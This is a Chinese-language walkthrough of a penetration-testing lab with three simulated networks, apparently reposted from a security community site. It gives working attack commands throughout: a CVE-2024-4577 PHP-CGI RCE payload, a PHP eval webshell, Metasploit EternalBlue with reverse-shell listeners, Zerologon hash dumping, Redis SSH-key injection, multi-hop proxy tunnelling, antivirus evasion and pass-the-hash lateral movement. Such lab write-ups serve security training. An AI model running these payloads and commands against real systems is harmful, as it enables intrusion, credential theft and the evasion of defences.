小迪安全2024内网靶场-VPC1 & VPC2 & VPC3

原文首发在：先知社区

https://xz.aliyun.com/news/17349

VPC1

入口机器192.168.133.185，尝试php8.2.12漏洞

利用CVE-2024-4577RCE

/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input

RCE写入php木马

<?php
file_put_contents('/test.php', '<?php
eval($_POST["test"]);
');
?>

尝试访问test.php，没读到上传的马，找一下上传目录

找到test.php，上传目录在C:\xampp\php目录下

xampp默认web目录一般在htdocs下

上传test.php到htdocs并连接，再上传后门并连接

对被控主机网络探测，发现其他主机

对192.168.2.4探测MS17-010(永恒之蓝)存在

用msf对MS17-010进行利用

新建foreign监听器，将权限分发给msf

msf指令

msfconsole  # 启动msf
use exploit/multi/handler   # 使用hanlder模块
set payload window/meterpreter/reverse_http   # 与cs中生成的一致
set lhost 192.168.133.160
set lport 1235

新建会话，选择msf监听器

此时cs上线的权限已经分发到msf

添加路由，让msf能访问目标主机访问目标内网其他主机

run autoroute -p  # 自动添加目标系统已知的所有网络路由
run post/multi/manage/autoroute

接下来使用msf中ms17_010模块

use exploit/windows/smb/ms17_010_eternalblue  # 使用该模块
set payload windows/x64/meterpreter/reverse_tcp   # 在当前模块设置一个payload,端口为该模块提供端口
set rhost 192.168.2.4   # 设置目标主机
set lhost 192.168.2.5   # 设置监听主机
set lport 1236
use exploit/multi/handler #回到exploit/multi/handler 模块,设置监听器以接受目标主机反向连接
set lhost 192.168.2.5  # 设置监听主机
set lport 1236      
use exploit/windows/smb/ms17_010_eternalblue  # 回到exploit/windows/smb/ms17_010_eternalblue模块
run

成功上线192.168.2.4

在cs上生成一个后门，用kali上传到192.168.2.4并运行，cs上线

upload homekaliDesktoptest2.exe C:test2.exe

mimikatz抓取192.168.2.4明文密码失败

进程注入，选择一个administrator权限的进程进行注入，降权至administrator抓取明文密码

利用明文密码横向移动，192.168.2.4有防火墙，所以正向上线192.168.2.6

成功上线192.168.2.6

对192.168.4.*扫描到7001端口，通常有weblogic服务

配置代理访问192.168.4.128

检查weblogic漏洞存在

上传内存马&cs后门上线192.168.4.128

mimikatz抓取192.168.10.128密码，对192.168.10.12进行横向

成功上线192.168.10.12

域控提权CVE-2020-1472连接dc清空凭证

sectetsdump.py拿到域控hash

psexec横向移动

成功上线dc，至此靶场结束

VPC2

nmap扫描入口机器192.168.133.189

访问8080端口发现tomcat服务，弱口令登录后台，部署war包getshell

上线cs信息收集

net user /domain&ping dc确认域控ip

扫描数据库常见端口，尝试连接数据库进行数据库提权

C:WebCodedanganWeb.config文件中找到数据库密码

配置代理，用mudt连接mssql，开xp_cmdshell成功命令执行

上传后门&上线cs

mimikatz抓取密码，尝试横向

借助impacket套件通过ipc$横向移动

将后门放在192.168.2.10web目录下，用certutil远程下载后门，失败了

登录靶机可以看到火绒拦截了certutil.exe

分离免杀后门成功上线，且火绒查杀不报毒

利用域控用户上线192.168.2.12

接下来继续探测域控内网，发现192.168.3.*网段

扫描到web服务

web页面是通达OA，直接工具一把梭

蚁剑成功连接

192.168.3.10有防火墙，所以正向上线

确定域控ip

域控提权CVE-2020-1472拿到hash

hash传递上线192.168.3.20

探测192.168.4.*内网

crackmapexec密码喷洒192.168.4.*

hash传递上线192.168.4.11

上传Adfind，探测发现存在约束委派（机器用户）

主机用户

约束委派攻击上传后门至192.168.4.20并执行

最后hash传递192.168.4.12，靶场完成

VPC3

fscan扫描入口机192.168.133.198存在redis未授权

写入公钥getshell

sshkeygen   # 生成密钥对
图形化界面将公钥保存至1.txt中(换行保存)
cat /home/kali/Desktop/1.txt | redis-cli -h 192.168.133.198 -x set test   # 将本地公钥写入redis数据库
redis-cli -h 192.168.133.198
config set slave-read-only no   # 设置文件写入权限
config set dir /root/.ssh   # 设置redis备份路径
config set dbfilename authrized_keys  # 设置保存文件名为 authorized_keys
save  # 将redis数据保存至磁盘
ssh -i id_ed25519 [email protected]  # 通过私钥连接目标机器ssh

整个过程就是将1.txt(公钥)从redis保存到了/root/.ssh下authorized_keys 文件中

msf生成一个后门，并在生成路径启动一个http服务，用被控目标主动下载后门

运行后门，上线至msf

msf获取目标全部路由

cat ~/.bash_history发现被控机器有ssh连接行为

被控目标切换到/root/.ssh目录下，成功连接192.168.52.20

生成后门上传至192.168.52.10

在192.168.52.10上启动http服务，让192.168.52.20下载后门

成功上线192.168.52.20

配置socks5代理

扫描192.168.4.*

./fscan -h 192.168.4.0/24 -p 1-65535 -np -nobr

访问web页面

用stowaway工具建立多层代理

第一层 192.168.133.160->192.168.133.198
admin:# kali
./linux_x64_admin -l 8888 -s 123
agent 0: # 被控机ubuntu1
./linux_x64_agent -c 192.168.133.160:8888 -s 123

第二层 192.168.52.10->192.168.52.20
agent 1: # 被控机ubuntu2
./linux_x64_agent -c 8889 -s 123
use 0# 切换到节点0,即ubuntu1
connect 192.168.52.20:8889
socks 7788

dirsearch扫描发现疑似源码泄露

拿到数据库密码，尝试数据库提权

mdut连接

目标有防火墙，采用反向后门上线至msf

确定域控ip，setspn -T ROOTKIT.org -q */*命令发现存在exchange服务

mimikatz抓取明文密码

stowaway再加一层代理，以通讯192.168.3.*

use 1 -> listen -> 1 -> 9000 # 切换到节点1,监听节点1的9000端口
agent2:
windows_x64_agent.exe -c 192.168.4.141:9000 -s 123 # 连接节点1

扫描192.168.3.*共发现3台机器

CVE-2020-0688对3.144进行exchange攻击

cve-2020-0688执行成功，用ysoserial.exe生成payload填入即可执行命令

上传后门至192.168.4.140，让目标远程下载，成功上线

上传mimikatz抓取到域控明文密码，可用域控明文密码横向移动

wmic可以直接横向

windows defender对横向移动手法拦截少，可以横向成功

cmd识别杀软:
wmic /namespace:\rootSecurityCenter2 path AntiVirusProduct get displayName,productState
powershell识别杀软:
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct

msf生成ps1后门

将后门上传至web服务目录，让目标机器下载，ps1不能直接下载，存为exe

远程下载免杀后门

成功上线，靶场完成

原文始发于微信公众号（亿人安全）：小迪安全2024内网靶场-VPC1 & VPC2 & VPC3